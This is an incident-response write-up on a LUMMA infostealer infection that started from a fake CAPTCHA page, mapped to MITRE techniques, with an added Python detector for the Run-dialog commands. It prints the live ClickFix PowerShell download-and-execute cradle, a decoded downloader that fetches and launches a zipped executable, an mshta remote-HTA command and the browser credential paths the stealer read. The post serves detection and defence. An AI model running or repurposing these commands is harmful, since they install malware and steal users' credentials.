
Fake CAPTCHA led to LUMMA

by Molly Dewis

25 November 2025

TL;DR

This post delves into a recent incident response engagement handled by NCC Group’s Digital Forensics and Incident Response (DFIR) team in May 2025 involving the infostealer LUMMA.
The findings presented in this blog post are summarised below:

  • Initial access via a drive-by compromise
  • Leveraging PowerShell to execute commands and download files
  • Targeting Microsoft Edge and Google Chrome data

Overview

Lumma C2 Stealer is a variant of information stealer malware, first sighted in December 2022. It is usually sold by a Russian-speaking threat actor as a Malware-as-a-Service offering.

A characteristic of infostealers is theft of sensitive data such as credentials, browser data and cryptocurrency. In this case, LUMMA was seen targeting browser data, specifically the data stores Login Data and Web Data for Microsoft Edge and Google Chrome.

Since it first appeared, LUMMA has utilised various tactics and techniques. In this incident, one host was impacted after the user was directed to a fake CAPTCHA verification page – one of the newer techniques observed in LUMMA campaigns.

Timeline

T + 0 minutes – Visited the fake CAPTCHA site

T + 1 minute – PowerShell execution and malicious file creation

T + 2 minutes – C2 connection and credential access activity

T + 7 minutes – Discovery activity

MITRE Techniques

Initial Access

T1189 – Drive-by Compromise

The affected user visited the legitimate hxxps://astapowerproject[.]net/ site; however, this visit led to 12 attempts to reach malicious sites, all of which were blocked. The hxxp://astapowerproject[.]net/ site was then visited. Every time the page was refreshed, the related searches would change. Example searches can be seen in the screenshot below.

Each URL was wrapped in a googleadservices[.]com link.

Subsequent visits were then made to the following malicious CAPTCHA sites, in this order:

  • 871549.eliteeyeview[.]co (…Loading.. and reCAPTCHA V3 Security pages)
  • myvantage.getitquickly[.]biz (reCAPTCHA V3 Security page)
  • 657.s3.fr-par.scw[.]cloud (reCAPTCHA V3 Security page)

At the time of the investigation, visiting the myvantage.getitquickly[.]biz URL redirected to the third URL, which was inaccessible, as seen below.

The 657.s3.fr-par.scw[.]cloud hostname suggests the resource was hosted on Scaleway, a European cloud provider, rather than AWS: s3 indicates that object storage is used, fr-par refers to the region (in this case Paris, France) and scw.cloud is Scaleway's domain.

Execution

T1204 – User Execution

The fake CAPTCHA page employs the ClickFix social engineering technique to download the malicious payload. This technique instructs the user to use a keyboard shortcut to open a Windows Run dialog, then paste and launch a command that the webpage has placed on the clipboard. At the time of detection, the URL was uploaded to the Any.Run sandbox and, as seen below, the user would have been presented with a fake CAPTCHA page.

The below verification steps would appear to the user:

  1. Press Windows Button and R
  2. Press CTRL + V
  3. Press Enter

The Run dialog (Microsoft.Windows.Shell.RunDialog) was opened and used to execute the PowerShell command: powershell -w hidden -nop -c $a='https://2n';$b='o.co/2OArm3';iex(irm ($a+$b)).

T1059.001 – Command and Scripting Interpreter: PowerShell

In addition to the PowerShell command executed in a hidden window, a second, heavily obfuscated PowerShell command was executed.

The decoded command was:

iexhxxps://pub-24086c859ed94d628b911deba63401ab.r2[.]dev/afc.zip
$zip="$env:TEMP\afc.zip";
$dest=Join-Path $env:TEMP ("afc_" + [guid]::NewGuid());
Expand-Archive -Path $zip -DestinationPath $dest;
Start-Process -FilePath (Join-Path $dest "AF1.exe");
$curl_command = $env:Temp;
function wFPvdCjBn($iFuLaZNIo, $AFAeOI) {curl $iFuLaZNIo -o $AFAeOI};
function OlxYsax($GIHRSiO){wFPvdCjBn $GIHRSiO $AFAeOI}
$AFAeOI = $env:Temp + '\afc.zip';
OlxYsax $CPSr.SubString(3,59);
Expand-Archive -Path $AFAeOI -DestinationPath $curl_command;
Add-Type -Assembly System.IO.Compression.FileSystem;
$JYcciN = [IO.Compression.ZipFile]::OpenRead($AFAeOI);
$RNofm =($JYcciN.Entries | Sort-Object Name | Select-Object -First 1).Name;
$mBSw = Join-Path $env:Temp $RNofm;
start $mBSw ;;

A breakdown of this command is:

  • iex: Invoke-Expression executes a string as code. It downloaded afc.zip from the iexhxxps://pub-24086c859ed94d628b911deba63401ab.r2[.]dev URL.
  • $zip="$env:TEMP\<zip file name>" sets the variable $zip to a path in the user's temporary folder. In this case, the malicious zip was created at C:\Users\<USER>\AppData\Local\Temp\afc.zip.

The afc.zip file contained AF1.exe along with several other files.

These files, with the exception of AF1.exe, were also created in C:\ProgramData\unr.

T1059.010 – Command and Scripting Interpreter: AutoHotKey & AutoIT

The C:\Users\<USER>\AppData\Roaming\deci.com file was created at the same time as afc.zip. This executable was identified as AutoIt v3 Script (Beta); AutoIt is a scripting language used for creating automation scripts.

Defence Evasion

T1027 – Obfuscated Files or Information

The PowerShell command to retrieve afc.zip was heavily obfuscated.

T1218.005 – System Binary Proxy Execution: Mshta

Once the Run dialog was opened, an mshta.exe process was created, running the "mshta.exe" hxxps://2no[.]co/2Od3Q3 =-+2346823 command.

This command uses mshta.exe to fetch and execute an HTA file from a remote URL. A successful connection was made to the 2no[.]co domain.
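Both commands launched from the Run dialog (the hidden-window PowerShell cradle under T1059.001 and the remote-URL mshta.exe invocation above) leave the same kind of trace: a process-creation event whose parent is explorer.exe and whose command line carries a download-and-execute pattern. The detection logic below is an added example written for this post, not NCC Group's tooling; the Sysmon-style records are constructed, with the two malicious command lines mirroring those quoted above.

```python
import re

# Constructed Sysmon-style process-creation records (EventID 1 fields), not taken
# from the incident's own logs. The first two mirror the commands quoted in the
# post; the third is a benign scheduled script included for contrast.
EVENTS = [
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell -w hidden -nop -c $a='https://2n';$b='o.co/2OArm3';iex(irm ($a+$b))"},
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\mshta.exe",
     "CommandLine": '"mshta.exe" https://2no.co/2Od3Q3 =-+2346823'},
    {"ParentImage": r"C:\Windows\System32\svchost.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r"powershell -ExecutionPolicy Bypass -File C:\Scripts\inventory.ps1"},
]

HIDDEN = re.compile(r"(?i)(?:^|\s)-w(?:indowstyle)?\s+h(?:idden)?\b")
NOPROFILE = re.compile(r"(?i)(?:^|\s)-no(?:p|profile)\b")
EXEC = re.compile(r"(?i)\b(?:iex|invoke-expression)\b")
FETCH = re.compile(r"(?i)\b(?:irm|iwr|invoke-restmethod|invoke-webrequest|downloadstring)\b")
URL = re.compile(r"(?i)\bhttps?://[\w.-]+(?:/\S*)?")

def reconstruct_url(cmdline):
    """ClickFix cradles split the URL across variables ($a+$b) so that no single
    literal looks like a URL; joining the quoted literals in order rebuilds it."""
    joined = "".join(re.findall(r"'([^']*)'", cmdline))
    m = URL.search(joined) or URL.search(cmdline)
    return m.group(0) if m else None

def classify(ev):
    """Return (detection_name, url) for a suspicious record, else None."""
    image = ev["Image"].lower()
    cmd = ev["CommandLine"]
    from_run_dialog = ev["ParentImage"].lower().endswith("\\explorer.exe")
    if image.endswith("\\powershell.exe") and all(p.search(cmd) for p in (HIDDEN, NOPROFILE, EXEC, FETCH)):
        name = "clickfix_powershell_cradle" if from_run_dialog else "powershell_download_cradle"
        return name, reconstruct_url(cmd)
    if image.endswith("\\mshta.exe"):
        m = URL.search(cmd)
        if m:  # mshta handed a remote URL instead of a local .hta file
            return "mshta_remote_hta", m.group(0)
    return None

def scan(events):
    """Run classify over every record and keep the hits with the process name."""
    return [(ev["Image"].rsplit("\\", 1)[-1], *hit)
            for ev in events if (hit := classify(ev))]
```

The reconstructed URL is what an analyst would pivot on in proxy logs; the third record shows that an ordinary -File invocation without the hidden-window and cradle tokens is not flagged.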

Credential Access

T1555.003 – Credentials from Password Stores: Credentials from Web Browsers

The AutoIt executable deci.com accessed the data stores Login Data and Web Data for both Microsoft Edge and Google Chrome browsers. Their file locations are:

  • C:\Users\<USER>\AppData\Local\Microsoft\Edge\User Data\Default
  • C:\Users\<USER>\AppData\Local\Google\Chrome\User Data\Default

Discovery

T1518.001 – Software Discovery: Security Software Discovery

The following commands were run at the time the host was compromised.

Command | Description
findstr pfirewall.log | findstr is a command-line utility used to search for specific strings of text within files. In this case, the string pfirewall.log is searched for.
netsh advfirewall show currentprofile | Displays the current active firewall profile settings for the Windows Defender Firewall.

Command and Control

T1071.001 – Application Layer Protocol: Web Protocols

The malicious executable AF1.exe initiated an outbound connection to the C2 blameaowi[.]run over HTTPS.

IOCs
